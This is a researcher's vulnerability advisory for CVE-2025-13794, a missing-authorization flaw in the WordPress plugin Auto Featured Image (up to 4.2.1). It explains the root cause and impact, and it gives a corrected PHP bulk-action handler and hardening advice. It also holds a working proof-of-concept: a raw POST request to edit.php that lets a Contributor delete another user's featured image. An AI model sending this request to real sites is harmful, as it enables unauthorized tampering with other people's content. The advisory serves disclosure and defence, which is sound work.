CVE-2025-13794 is an Incorrect Authorization / Missing Authorization (CWE-862) vulnerability in the WordPress plugin Auto Featured Image (Auto Post Thumbnail) that breaks WordPress’ object-level access control for post thumbnails when bulk actions are used from the Posts list screen. The vulnerability affects all versions up to and including 4.2.1, and it allows authenticated attackers with Contributor-level access or higher to delete or generate featured images on posts they do not own, effectively enabling cross-user content tampering without the normal “can you edit this specific post?” gate. Because the plugin is widely deployed (WordPress.org shows 50,000+ active installations), this kind of low-privilege workflow bypass has real operational impact on multi-author sites, editorial teams, and any WordPress environment that relies on role separation to protect content integrity.

CVE: CVE-2025-13794
Plugin Version: Auto Featured Image <= 4.2.1
All Time: 1 805 023
Active installations: 50 000+
Publicly Published: December 15, 2025
Last Updated: December 15, 2025
Researcher: Dmitrii Ignatyev
PoC: Yes
Exploit: No
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13794
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-post-thumbnail/auto-featured-image-421-missing-authorization-to-authenticated-contributor-post-thumbnail-modification
https://t.me/cleantalk_researches/368

Timeline

November 19, 2025: Plugin testing and vulnerability detection in the Auto Featured Image (Auto Post Thumbnail) have been completed
November 19, 2025: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
December 15, 2025: Registered CVE-2025-13794

Discovery of the Vulnerability

Public vulnerability records describe the root cause as a missing capability check inside the plugin’s bulk action handler (commonly referenced as bulk_action_generate_handler), where requests that perform thumbnail operations do not enforce per-post authorization. In WordPress terms, the handler processes the selected post IDs from the bulk action submission and applies actions like “delete featured image” or “generate featured image” without calling current_user_can('edit_post', $post_id) for each targeted post, which is exactly the check WordPress uses to enforce author ownership boundaries and role-based restrictions at the object level. The NVD entry explicitly states that this missing capability check enables authenticated Contributor+ attackers to delete or generate featured images on posts they do not own, which matches the practical workflow shown in the PoC below: the Posts list bulk actions combined with a reusable bulk nonce.

Understanding Missing Authorization attacks

At a security-model level, this bug is a textbook horizontal privilege escalation against content metadata: the attacker is not “becoming an admin,” but they are gaining the ability to modify an object they should be forbidden to change. In WordPress, featured images are not cosmetic trivia—they are often the primary visual representation of a post across the homepage, category archives, Open Graph/social previews, “featured content” blocks, and newsletter thumbnails, so manipulating them can directly alter what the public sees and how a site’s content is perceived. CVE-2025-13794 is particularly important because bulk actions are a trusted, high-throughput administrative mechanism; when a plugin hooks bulk processing without per-item authorization checks, it effectively allows a low-privileged user to “apply admin-like batch edits” to objects outside their scope. The CVE is mapped to CWE-862 (Missing Authorization), reinforcing that the flaw is not about input formatting or nonce presence, but about failing to enforce the correct authorization decision for each target post. 

Exploiting the Missing Authorization Vulnerability

To exploit CVE-2025-13794, an attacker with Contributor+ cookies submits the following bulk-action request to edit.php, targeting a post ID they do not own:

POC:

POST /wordpress/wp-admin/edit.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/edit.php?paged=1&apt_bulk_action=1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=2%7C1763659810%7CuvFpCfURypDUIn9dSyAh52B5N2LMoeGldyXJhb27pI3%7C0d4a48167be49ae085c8f07ff43ae432ada4134a5e119fb6436450e3705168a9; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=2%7C1763659810%7CuvFpCfURypDUIn9dSyAh52B5N2LMoeGldyXJhb27pI3%7Ca3113b5a10aaf58542fac68a5095be2d5b6b8dcaa1189c205d87a443a29f4d60; wp-settings-time-3=1763487015; wp-settings-3=libraryContent%3Dapt
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

_wpnonce=nonce_from_posts-filter__wpnonce&post%5B%5D=79&action=apt_delete_thumb


The impact of CVE-2025-13794 is primarily integrity damage and content disruption, with a practical “defacement-lite” profile: attackers can remove a featured image from a high-visibility post, force a generated image that doesn’t match editorial intent, or trigger automated image replacement behaviors (depending on configuration) to change how posts render on key templates. On sites where featured images drive homepage cards, hero banners, and social preview cards, even a single unauthorized thumbnail change can produce reputational harm, confuse readers, and create downstream operational load for editors who must audit and restore visuals across multiple posts. Because the action is low-friction and can be repeated across many post IDs through bulk selection parameters, a malicious Contributor account (or a compromised one) can cause widespread visual disruption quickly—especially on multi-author news/blog sites where role separation is the primary control preventing authors from modifying each other’s content. The NVD record characterizes the vulnerability as unauthorized modification of data due to missing capability checks, which captures the essence: it is a permission boundary failure, not merely a UI quirk. 

Recommendations for Improved Security

The correct fix is to enforce object-level authorization for every post ID in the bulk action payload before performing any thumbnail operation, and to fail closed if the caller lacks permission for any targeted object. Specifically, the handler should validate each post_id as an integer, confirm the post exists, and require current_user_can('edit_post', $post_id) (or the equivalent mapped capability for the post type) before calling delete_post_thumbnail(), triggering generation, or invoking replace logic; this is the missing guardrail identified in the CVE summary for the vulnerable bulk action handler. From a defensive operations standpoint, site owners should update beyond the affected range (NVD: ≤ 4.2.1 is vulnerable) and treat this as a role-separation regression test: if your site relies on Contributors/Authors, audit whether they can access bulk actions and consider temporarily restricting roles or tightening editorial workflows until patched. Since exploitation depends on authenticated access, also review account hygiene (remove unused authors, enforce MFA where possible, monitor unexpected bulk-action submissions), because authorization bugs become dramatically easier to exploit when low-priv accounts are abundant. 
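The per-post gate described in the discovery section and the fix outlined above, as an added example that is not the plugin's own code: a bulk-action handler for the Posts list screen that validates every submitted ID, requires current_user_can('edit_post', $post_id) for each target, and fails closed for the whole batch if any target is denied. The bulk_actions-edit-post and handle_bulk_actions-edit-post filters, check_admin_referer, absint, get_post, delete_post_thumbnail and add_query_arg are WordPress core APIs; the action slugs and the apt_example_* hook names are assumptions made for this example.

```php
<?php
/**
 * Added example, not code from the Auto Featured Image plugin.
 * Demonstrates object-level authorization inside a Posts list bulk action.
 * Assumed: action slugs apt_delete_thumb / apt_generate_thumb and the
 * apt_example_* hook names. Everything else is WordPress core API.
 */

// Register the two bulk actions in the Posts list drop-down (screen id "edit-post").
add_filter( 'bulk_actions-edit-post', function ( array $actions ): array {
    $actions['apt_delete_thumb']   = 'Delete featured image';
    $actions['apt_generate_thumb'] = 'Generate featured image';
    return $actions;
} );

// Vulnerable shape, for contrast only: once the form nonce passes, every
// submitted ID is acted on, so a Contributor can target any post.
//
//   foreach ( $post_ids as $post_id ) { delete_post_thumbnail( $post_id ); }

add_filter( 'handle_bulk_actions-edit-post', 'apt_example_bulk_handler', 10, 3 );

/**
 * @param string $redirect_to URL core will redirect to after the action.
 * @param string $doaction    Selected bulk action slug.
 * @param array  $post_ids    Raw post[] values from the submitted form.
 */
function apt_example_bulk_handler( string $redirect_to, string $doaction, array $post_ids ): string {
    if ( 'apt_delete_thumb' !== $doaction && 'apt_generate_thumb' !== $doaction ) {
        return $redirect_to;
    }

    // The list-table nonce ("bulk-posts") proves the form was submitted on
    // purpose; it says nothing about which posts the user may edit. Core
    // already checks it before this filter fires, but a handler that may be
    // reached by another path should verify it itself.
    check_admin_referer( 'bulk-posts' );

    // First pass: validate and authorize every target before touching any of them.
    $authorized = array();
    $denied     = 0;
    foreach ( $post_ids as $raw_id ) {
        $post_id = absint( $raw_id );
        $post    = $post_id ? get_post( $post_id ) : null;

        // "edit_post" is a meta capability resolved by map_meta_cap(): a
        // Contributor passes only for their own unpublished posts and fails
        // for anyone else's, which is exactly the missing gate in CVE-2025-13794.
        if ( ! $post || ! current_user_can( 'edit_post', $post_id ) ) {
            $denied++;
            // Audit signal for monitoring unexpected bulk submissions (assumed hook).
            do_action( 'apt_example_bulk_denied', get_current_user_id(), $post_id, $doaction );
            continue;
        }
        $authorized[] = $post;
    }

    // Fail closed: one forbidden target aborts the entire batch.
    if ( $denied > 0 ) {
        return add_query_arg( array( 'apt_denied' => $denied ), $redirect_to );
    }

    // Second pass: act only on posts the caller is allowed to edit.
    foreach ( $authorized as $post ) {
        if ( 'apt_delete_thumb' === $doaction ) {
            delete_post_thumbnail( $post );
        } else {
            // Generation is plugin-specific; delegate to an assumed hook.
            do_action( 'apt_example_generate_thumbnail', $post->ID );
        }
    }
    return add_query_arg( array( 'apt_done' => count( $authorized ) ), $redirect_to );
}
```

The two-pass shape is deliberate: checking all IDs before acting on any of them means a mixed batch (some owned posts, some not) changes nothing, so an attacker cannot pad a request with their own post IDs to smuggle a foreign one through, and the apt_denied count surfaces in the redirect where an admin or a log rule can notice it.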

By taking proactive measures to address Missing Authorization vulnerabilities like CVE-2025-13794, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.



Dmitrii I.
CVE-2025-13794 – Auto Featured Image – Missing Authorization to Authenticated (Contributor+) Post Thumbnail Modification – POC
